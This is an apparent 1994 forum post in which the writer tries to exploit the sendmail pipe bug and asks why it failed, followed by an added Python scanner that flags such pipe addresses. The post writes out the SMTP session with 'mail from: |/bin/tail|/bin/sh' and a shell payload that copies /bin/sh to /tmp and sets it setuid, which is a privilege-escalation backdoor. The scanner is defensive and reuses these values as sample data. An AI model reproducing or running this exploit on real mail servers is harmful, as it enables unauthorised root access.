Q: Sendmail Bug using From: |/bin/tail|/bin/sh

Post by EQR8KHOK.. » Thu, 17 Nov 1994 03:53:18



We have sendmail 5.0 installed on System V Release 4.0.
I tried to exploit the sendmail bug but no luck. I tried:

helo
mail from: |/bin/tail|/bin/sh
rcpt to: fred  (that's me)
data


Return-Receipt-To: |fooooobar
Subject: Checking our mail for vulnerabilities

hello.

#!/bin/sh
echo This is a test > /tmp/b1
echo id is: >> /tmp/b1
/bin/id >> /tmp/b1
echo *****KRAD****** >> /tmp/b1
cp /bin/sh /tmp/afil3
chmod u+s /tmp/afil3
echo /tmp/afil3 contains a krad file >> /tmp/b1
chmod ugo+rx /tmp/afil3

Now what happens is that I get the message returned to me with:

Message  2:
From |/bin/tail|/bin/sh Tue Nov 15 18:18 GMT 1994
Date: Tue, 15 Nov 1994 18:14:00 +0000

as the header... why have I got it back? I think the mail program should
have executed the program I put.. so why didn't it create the shell?
Any input would be greatly appreciated... e-mail your response if you know
how to get it working... thanks.
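
A defensive check for the pattern in the post above, added here as an example and not part of the original post: it scans an SMTP session transcript and reports envelope or header addresses that begin with `|`, which is sendmail's syntax for piping a message to a program. The function names, the header list and the sample transcript are constructed for illustration.

```python
import re

# SMTP envelope commands, and headers that can carry a return address.
# The header list is an assumption chosen for this example.
ENVELOPE_RE = re.compile(r"^\s*(mail\s+from|rcpt\s+to)\s*:\s*(.*)$", re.I)
HEADER_RE = re.compile(
    r"^(return-receipt-to|errors-to|reply-to|from|sender)\s*:\s*(.*)$", re.I)

def is_program_address(addr):
    """True when the address, minus <> and quotes, begins with '|'."""
    return addr.strip().strip("<>").strip().strip('"').lstrip().startswith("|")

def scan_transcript(lines):
    """Return (line_no, field, value) for each pipe-prefixed address found."""
    findings = []
    in_data = in_headers = False
    for no, raw in enumerate(lines, 1):
        line = raw.rstrip("\r\n")
        if in_data:
            if line == ".":                  # end of message, back to commands
                in_data = in_headers = False
            elif in_headers and line == "":
                in_headers = False           # blank line ends the header block
            elif in_headers:
                m = HEADER_RE.match(line)
                if m and is_program_address(m.group(2)):
                    findings.append((no, m.group(1).upper(), m.group(2).strip()))
            continue                         # body text is never inspected
        m = ENVELOPE_RE.match(line)
        if m and is_program_address(m.group(2)):
            field = re.sub(r"\s+", " ", m.group(1)).upper()
            findings.append((no, field, m.group(2).strip()))
        elif line.strip().lower() == "data":
            in_data = in_headers = True
    return findings

# Constructed transcript: the flagged values are the ones quoted in the post.
SAMPLE = [
    "helo client.example", "mail from: |/bin/tail|/bin/sh", "rcpt to: fred",
    "data", "Return-Receipt-To: |fooooobar", "Subject: test", "",
    "body line with a | in it", ".",
    "mail from: <alice@example.org>", "rcpt to: <bob@example.org>", "quit",
]

if __name__ == "__main__":
    for line_no, field, value in scan_transcript(SAMPLE):
        print(f"line {line_no}: {field} is a program address: {value}")
```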

 
 
 
